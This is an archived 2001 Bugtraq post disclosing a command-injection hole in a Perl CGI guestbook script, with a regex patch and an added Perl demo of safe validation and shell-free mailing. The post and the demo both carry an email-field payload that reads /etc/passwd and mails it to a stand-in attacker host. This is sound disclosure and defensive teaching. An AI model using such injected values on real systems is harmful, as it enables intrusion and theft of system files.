[23020] in bugtraq

home help back first fref pref prev next nref lref last post

cgi vulnerability

daemon@ATHENA.MIT.EDU (supdavid)
Tue Oct 30 12:24:09 2001

From: "supdavid" <supdavid@bluewin.ch>
To: <bugtraq@securityfocus.com>
Date: Tue, 30 Oct 2001 16:04:23 +0100
Message-ID: <KKEJJBACFEGPLHJMEBMMCEFFCAAA.supdavid@bluewin.ch>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

hi all
I found a security hole in Book of guests and Post it!, written by Seth
Leonard. It is available at http://www.dreamcachersweb.com
The problem is that this script doesn't filter out ANY metacharacters from
the input and passes it to the shell.
Therefore, by writing something like email@mail.com;cat /etc/passwd|mail
evil@evilhost.com into the email field, the attacker could take control
of the host.

patch:
First of all, it isn't a bad idea to set the permissions of the script
correctly. Furthermore, the line
if ($INPUT{'email'} =~ /(.*)@(.*)/) { ... } should be replaced by something
like
if ($INPUT{'email'} =~ /^[\w.-]+\@[\w.-]+$/) { ... }

David Kumme, 16
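
Added example, not part of David Kumme's post and not code from Seth
Leonard's scripts: a small Perl program that shows why the unanchored
check the post describes accepts the attack string from the post while the
completed whitelist pattern rejects it, and how to hand the address to the
mailer with no shell in between. The post does not quote the script, so
the shape of the vulnerable command line, the input field names, the
message text and the sendmail path are assumptions for illustration.

```perl
#!/usr/bin/perl
# Added example, not code from the original post or from the
# "Book of guests" / "Post it!" scripts.  The command-line shape of the
# vulnerable code, the message text and the sendmail path are assumptions.
use strict;
use warnings;

# Constructed inputs: one benign address and the attack string from the post.
my @inputs = (
    'user@example.com',
    'email@mail.com;cat /etc/passwd|mail evil@evilhost.com',
);

# The check the post says the script uses.  It is unanchored, so any string
# containing an '@' somewhere satisfies it, including the attack string;
# ';' and '|' are never rejected.
sub weak_check {
    my ($email) = @_;
    return ($email =~ /(.*)\@(.*)/) ? 1 : 0;
}

# The post's proposed replacement, completed: anchored at both ends, with
# only word characters, '.' and '-' allowed on either side of the '@'.
# \z instead of $ so that a trailing newline is rejected as well, which
# matters once the address is written into a mail header.
sub strict_check {
    my ($email) = @_;
    return ($email =~ /^[\w.-]+\@[\w.-]+\z/) ? 1 : 0;
}

# Assumed shape of the vulnerable code: the address is interpolated into a
# command string, and a one-argument pipe open hands that string to /bin/sh,
# which splits it on ';' and '|' and runs the extra commands as the web
# server user.  Never do this with user input.
sub vulnerable_mail_command {
    my ($email) = @_;
    return "|/usr/lib/sendmail $email";   # would be passed to open(MAIL, ...)
}

# Hardened version: validate first, then use the list form of open so that
# sendmail is executed directly with fixed arguments and no shell is involved.
# The recipient goes into the To: header (sendmail -t reads it from there),
# so the user-supplied value is never part of the command line at all.
sub send_mail {
    my ($email, $body) = @_;
    die "rejected address: $email\n" unless strict_check($email);
    open(my $mail, '|-', '/usr/lib/sendmail', '-t', '-oi')
        or die "cannot run sendmail: $!\n";
    print {$mail} "To: $email\nSubject: guestbook entry\n\n$body\n";
    close($mail) or die "sendmail failed: $!\n";
}

for my $e (@inputs) {
    printf "%-55s weak=%d strict=%d\n", $e, weak_check($e), strict_check($e);
}
```

Run it as a plain Perl script: it prints the result of both checks for each
input, and the attack string passes weak_check but fails strict_check.
send_mail is defined but not called by the demo loop, so nothing is
actually sent; it is the form the CGI handler should use once it has read
the field.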

